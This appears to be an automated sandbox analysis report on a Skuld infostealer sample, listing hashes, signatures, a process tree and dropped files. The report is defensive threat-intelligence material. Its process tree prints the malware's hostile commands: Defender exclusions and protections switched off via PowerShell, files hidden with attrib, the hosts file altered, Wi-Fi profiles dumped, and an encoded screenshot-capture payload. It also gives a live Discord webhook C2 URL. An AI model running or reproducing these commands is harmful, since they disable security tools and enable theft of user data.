Analysis

  • max time kernel
    76s
  • max time network
    78s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    27-06-2024 01:49

Errors

Reason
Machine shutdown

General

  • Target

    skuld.exe

  • Size

    9.5MB

  • MD5

    415f77727369accea04148269aa87c3b

  • SHA1

    5fb012e44ee1043873d9aa07c64c1f3fbc23df28

  • SHA256

    3b82c418dc34855ca8ab829ca230e530670daa200edf688e183af231ac40fc35

  • SHA512

    55b9fa613e23f82c995a55bfa5681c43f75b6e9bf48eac7dc961e8fd3f5cd4f51dfeb22a3fc33354b291b254069a34be81cbfb97b4aaf3516411adeb278954c6

  • SSDEEP

    98304:ZjhRj04QxsehBHbb9Z3IJ3tHodES5kF8Yl19WfP:by4QxjTZ3IJ3FoOSC1Af

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1255700813808930836/1DxZg8qtYOD5X2gFGfrqyTAKrDYrmbL9tqr6F93UFVUB3hYk0wRcUkFCx6nMlBuIPJ8e

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\skuld.exe
    "C:\Users\Admin\AppData\Local\Temp\skuld.exe"
    1⤵
    • Drops file in Drivers directory
    • Adds Run key to start application
    • Maps connected drives based on registry
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3748
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\skuld.exe
      2⤵
      • Views/modifies file attributes
      PID:3896
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      2⤵
      • Views/modifies file attributes
      PID:3976
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4172
    • C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious use of AdjustPrivilegeToken
      PID:3884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\skuld.exe
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:408
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      2⤵
        PID:1716
      • C:\Windows\System32\Wbem\wmic.exe
        wmic cpu get Name
        2⤵
          PID:4052
        • C:\Windows\System32\Wbem\wmic.exe
          wmic path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:4876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3436
        • C:\Windows\System32\Wbem\wmic.exe
          wmic csproduct get UUID
          2⤵
            PID:1368
          • C:\Windows\system32\netsh.exe
            netsh wlan show profiles
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3396
          • C:\Windows\system32\attrib.exe
            attrib -r C:\Windows\System32\drivers\etc\hosts
            2⤵
            • Drops file in Drivers directory
            • Views/modifies file attributes
            PID:2940
          • C:\Windows\system32\attrib.exe
            attrib +r C:\Windows\System32\drivers\etc\hosts
            2⤵
            • Drops file in Drivers directory
            • Views/modifies file attributes
            PID:3112
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of WriteProcessMemory
            PID:1556
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5enctfzo\5enctfzo.cmdline"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1508
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES41BC.tmp" "c:\Users\Admin\AppData\Local\Temp\5enctfzo\CSCD20FF1E51A64EC288BF7EB1C5A094A4.TMP"
                4⤵
                  PID:1000
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe"
            1⤵
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2788
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff2880ab58,0x7fff2880ab68,0x7fff2880ab78
              2⤵
                PID:4260
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1576 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:2
                2⤵
                  PID:4076
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:8
                  2⤵
                    PID:3892
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:8
                    2⤵
                      PID:4244
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:1
                      2⤵
                        PID:1956
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3104 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:1
                        2⤵
                          PID:3148
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3496 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:1
                          2⤵
                            PID:2880
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4472 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:8
                            2⤵
                              PID:4800
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4408 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:8
                              2⤵
                                PID:408
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:8
                                2⤵
                                  PID:3112
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:8
                                  2⤵
                                    PID:3228
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:8
                                    2⤵
                                      PID:3432
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4848 --field-trial-handle=1832,i,18013287369712259951,522357217042311554,131072 /prefetch:1
                                      2⤵
                                        PID:328
                                    • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                      "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                      1⤵
                                        PID:4344
                                      • C:\Windows\system32\LogonUI.exe
                                        "LogonUI.exe" /flags:0x4 /state0:0xa3a20855 /state1:0x41c64e6d
                                        1⤵
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2784

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\83ba98ee-0f39-4fa6-bc3c-233875ef1b2c.tmp

                                        Filesize

                                        6KB

                                        MD5

                                        e0727627f45c24316c55ae7952f05e86

                                        SHA1

                                        46643ac82e8bca604eae2b90609abb57a95087e8

                                        SHA256

                                        85eae29397954fa3b4e0f5992d59be264d2f8511c5777b35b6506caa10b3e2b6

                                        SHA512

                                        8069bdede5c7fa014c7332b432714debee4da85de2db434d64c9d127a8992a3f248ce9702a9bbabeb80647dc45e3bfed761245508be8bf7f8484a84fd30cfff9

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

                                        Filesize

                                        211KB

                                        MD5

                                        151fb811968eaf8efb840908b89dc9d4

                                        SHA1

                                        7ec811009fd9b0e6d92d12d78b002275f2f1bee1

                                        SHA256

                                        043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

                                        SHA512

                                        83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                        Filesize

                                        168B

                                        MD5

                                        38ae152a2af49d6f52965a575bef7826

                                        SHA1

                                        40f5374d5cc6c6035f0a926505e4070d5443757d

                                        SHA256

                                        d2f6c652d545eed0137d25aaed76fd5e8386b03ca0a7d89524cd014a60d47cdd

                                        SHA512

                                        1dc36e4c7d03ddf7e2d67ac822d126c9e929779e8b0c813f9c9f8f2779181b23249a441c70ef708e289c529d1f6d3a66d7e7e54419f0fc7a793c1275ef30cb55

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                        Filesize

                                        168B

                                        MD5

                                        2643169e5cbef46fd6f2ecb4c2117c31

                                        SHA1

                                        2bfef45e25c6c0c20b8e233390a1fc8f9cee5b19

                                        SHA256

                                        8d0ff7f2b02900438f9a4be74d625153132553b0932fad5a0727245247aa7c2a

                                        SHA512

                                        0a362aca3b46ad4c082589eb3ed9dc09f751ce3a25591bcd6ea032a9ab6e200a845cdcaa72a3aad1816b20e4f0e67377fdc7d1114ccaaa91831e5f38c16a0ff8

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                        Filesize

                                        2KB

                                        MD5

                                        5861279269b620de6c3312ce280a97fd

                                        SHA1

                                        c80ce5fb7f59c8bfbd1071a36b75d0be818b4a7f

                                        SHA256

                                        0973d6e690c14ded3d9ff55d71fcfd650e4cfbfd3583b4c45bcc5817eabd40e8

                                        SHA512

                                        f548b61f925b64ad10c8d1348687a47459bf7bc8da0c763950146ef91d59209b237df95f837c800a7a413f6294687e72b78d27afe26a86aea435eaddce82d175

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                        Filesize

                                        2B

                                        MD5

                                        d751713988987e9331980363e24189ce

                                        SHA1

                                        97d170e1550eee4afc0af065b78cda302a97674c

                                        SHA256

                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                        SHA512

                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                        Filesize

                                        356B

                                        MD5

                                        a82260999d0ca66c796531441cf4f81b

                                        SHA1

                                        09fd944bdafef1aaa4c85d3a5c4697b99d52a35c

                                        SHA256

                                        19e26ae4b8a38de1fff052d8542032341f3adbaaaf2e3d37f648dad72688ce81

                                        SHA512

                                        5fffa6adf5d451fb54a3bc767f61a7e506913ee36b457c2f6239850a5b51fe15d36dda472693b9976941a10e3450cf9dad2c88f756f3e715866ffd64481390d7

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                        Filesize

                                        356B

                                        MD5

                                        cedafa31f84f11a7c17e94a51e276eb0

                                        SHA1

                                        a5d6c3f41463f6d3cc5a4c3d363bdca113af4e6b

                                        SHA256

                                        9a09d5134b8340935a090ffe6b6d24c294a65f5dccbf1bb0f7c99066e499934b

                                        SHA512

                                        82ac56a752d0b53e54fae28587848fad975dc3a82b78f0e8d8709d841f025fab7bb77d1b825f64bc90acf910396923450aca03582d2501af84be7afd5e0d5a21

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                        Filesize

                                        7KB

                                        MD5

                                        5ff701715117cd2a5235a14ce766a389

                                        SHA1

                                        00dcaf748a3a0c2bb0f0c8ae4508637f8638f5a4

                                        SHA256

                                        8504246f01a7b52154c2ea10af9ab0ca4fe8e96956927847c332de4f078c3abb

                                        SHA512

                                        476ea79c987639e67a4a83a5723e866c82900b32a671d9b1f3f23f3b8097e8680fcf54b5dd09e4415f262c02856fc6a64095a023078de89bc2c356c3d2eb5915

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                        Filesize

                                        7KB

                                        MD5

                                        757bd793fa2b5bae8e04339b314b3242

                                        SHA1

                                        5591c205a0167cc7347826713fc0d2f157e978c5

                                        SHA256

                                        4cb629e867b080f9bb4fd3a1dd508ebc70312fdf4e5e7ef97d16d2218084af8d

                                        SHA512

                                        a2e656d2aea628f4260fd6d4987fd4eda215004289f9849c0a6100117e9fadd068d873da402cf5553b041b84a7aca3214dc4ee7e99752621a72217c3e6acec4d

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                        Filesize

                                        7KB

                                        MD5

                                        069954222ae0d96637c0b9829db4ebc7

                                        SHA1

                                        6d6d4318e155057da429bf2210a9e8d2270ea490

                                        SHA256

                                        fbc4814b6c51160c588c7070449118ae6fddc0768ce4f154046f7a8bd9230fb5

                                        SHA512

                                        c99d717c2267a54db51b379ff42ce4d534c03d5548fb2b913c123f0d4aea5fbd78cf62ed1dc2df681b665a87167daee423b66064ad86e4b7f39e4ceaa18fd479

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                        Filesize

                                        16KB

                                        MD5

                                        b64ab98ce94c1600752f0fddcb6da5dd

                                        SHA1

                                        5e737acd23a1746884b6ce99e113210f16f9c6d1

                                        SHA256

                                        4dca3cc65764e330c22cf708e11ec887af469765f91ef20852c2f8d111ebdd7d

                                        SHA512

                                        c3d856c4c71e7c4bb540ce5a5be01b1aa0d8398753f465314ffa00f1599a246802308a654433dfc5adda517ef93229b97991e23ae9ad7d9e6f3cd062dc2e1228

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                        Filesize

                                        281KB

                                        MD5

                                        db900d24ca5dedcc505eb1df4c05afd9

                                        SHA1

                                        d90e2b29ac32be0725904fe6cf33b139c6e3124e

                                        SHA256

                                        62c8556bf185c64fa6e62aa6c87c8022b45875192ff9d5283fc6deb229c0d5ab

                                        SHA512

                                        724439ec77963e4169247269b3dc0162fe653418296f65913f4557caf2af6515886a528121b87029b415d7a1edf61025412fd503d5c35fdc3eeccf861d0aa44a

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                        Filesize

                                        281KB

                                        MD5

                                        b4d07651cd0097905c27be800b79f788

                                        SHA1

                                        f4cf5572747a1675a4590091d5126adbf61df0ec

                                        SHA256

                                        0e0aff98b38508df9fe47aaf6b69a6d365de8f91c05236335ad0084f113b3b5b

                                        SHA512

                                        ea7e2ad2cb82e221be50848d83e337d1fc928f7c9f579e576afc7672adf41bf20943d46c43d4e3db780e661e166610d3a2e23e6cfb18b345b1e4bb2bb53c3b23

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

                                        Filesize

                                        264KB

                                        MD5

                                        3c4337d338264ab1f7cdc14cd089a01a

                                        SHA1

                                        689a017ea215d0671dd3c701545b9e8ea11ab0f3

                                        SHA256

                                        8790263a4d705b9f966885de3db4774a7f89856016dfc0327900cb42ae8f9c15

                                        SHA512

                                        358a0a94b1c836de06a242f1401404f9518708232aa6f7dc2ba87da3e0f4e74d51948667e9b600334e29ac4db24012f2b67da99740581595d6f826504ebf87c0

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                        Filesize

                                        2KB

                                        MD5

                                        627073ee3ca9676911bee35548eff2b8

                                        SHA1

                                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                        SHA256

                                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                        SHA512

                                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        e3840d9bcedfe7017e49ee5d05bd1c46

                                        SHA1

                                        272620fb2605bd196df471d62db4b2d280a363c6

                                        SHA256

                                        3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

                                        SHA512

                                        76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        69416944dac24129d0969e2ac46f0533

                                        SHA1

                                        d71969659956b32411e0606a9bee640a0b108ef4

                                        SHA256

                                        dffc7e01106427982d7cafd3d7e3be37e16b098fbb0958410ea8d7c68bfb97ca

                                        SHA512

                                        aabb330053579af0d9de2661bd70eaadfd2e2e617759bc9c380db1c64731c6711304e49882138e9d337815377ee012a7458f91f692cb31538d73624385867f4c

                                      • C:\Users\Admin\AppData\Local\Temp\5enctfzo\5enctfzo.dll

                                        Filesize

                                        4KB

                                        MD5

                                        fa6e984079a14cb6b17637e781550c28

                                        SHA1

                                        412f472f6a637a0763e3cbb91c773d63dc4e65ac

                                        SHA256

                                        e3ac0a10141d15338e9d638c6c55efef20f6e2fb525034a11ec264919009666e

                                        SHA512

